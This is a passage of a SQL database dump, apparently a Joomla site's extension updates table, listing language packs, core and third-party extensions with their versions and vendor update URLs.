Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13750,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13751,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13752,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13753,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13754,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13755,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13756,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13757,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13758,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13759,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(13760,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13761,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13762,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13763,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13764,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13765,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13766,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13767,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13768,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13769,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13770,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13771,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13772,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13773,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13774,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13775,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13776,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13777,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13778,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13779,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13780,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13781,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13782,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13783,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13784,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13785,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13786,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13787,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13788,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13789,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13790,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13791,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13792,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13793,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13794,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13795,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13796,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13797,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13798,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13799,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13800,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13801,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13802,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13803,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13804,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13805,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13806,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13807,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13808,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13809,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13810,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13811,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13812,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13813,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13814,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13815,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13816,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13817,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13819,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13820,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13821,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13822,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13823,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13824,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13825,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13826,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13827,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13828,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13829,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13830,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13831,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13832,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13833,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13834,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13835,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13836,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13837,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13838,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13839,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13840,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13841,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13842,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13843,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13844,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13845,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13846,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13847,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13848,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13849,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13850,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13851,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13852,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13853,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13854,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13855,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13856,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13857,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13858,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13859,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13860,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13861,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13862,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13863,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13864,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13865,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13866,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13867,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13868,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13869,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13870,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13871,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13872,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13873,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13874,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13875,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13876,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13877,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13878,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13879,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13880,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(13881,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13882,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13883,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13884,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13885,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13886,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13887,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13888,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13889,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13890,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13891,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13892,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13893,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13894,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13895,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13896,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13897,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13898,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13899,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13900,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13901,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13902,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13903,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13904,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13905,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13906,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13907,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13908,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13909,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13910,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13911,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13912,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13913,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13914,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13915,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13916,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13917,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13918,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13919,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13920,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13921,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13922,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13923,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13924,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13925,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13926,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13927,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13928,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13929,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13930,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13931,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13932,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13933,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13934,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13935,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13936,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13937,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13938,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13939,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13940,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13941,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13942,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13943,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13944,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13945,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13946,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13947,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13948,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13949,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13950,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13951,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13952,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13953,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13954,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13955,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13956,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13957,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13958,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13959,3,0,'Chinese 